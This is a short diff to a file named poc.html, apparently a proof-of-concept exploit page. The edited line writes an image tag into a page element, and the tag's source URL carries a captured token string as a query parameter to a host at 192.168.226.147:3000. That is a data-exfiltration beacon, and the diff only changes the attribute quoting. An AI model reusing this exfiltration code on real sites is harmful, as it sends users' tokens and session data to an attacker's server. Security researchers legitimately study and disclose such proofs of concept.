--- a/poc.html
+++ b/poc.html
@@ -7,7 +7,7 @@
         //alert(result);
         result = "getToken:3d3f329f434af2325425d1e2";
         var url = "http://192.168.226.147:3000";
-        document.getElementById('divads').innerHTML = "<img src='" + url + "?userdata=" + encodeURI(result) + "'/>";
+        document.getElementById('divads').innerHTML = "<img src=" + url + "?userdata=" + encodeURI(result) + "/>";
     }
     catch (e)
     {
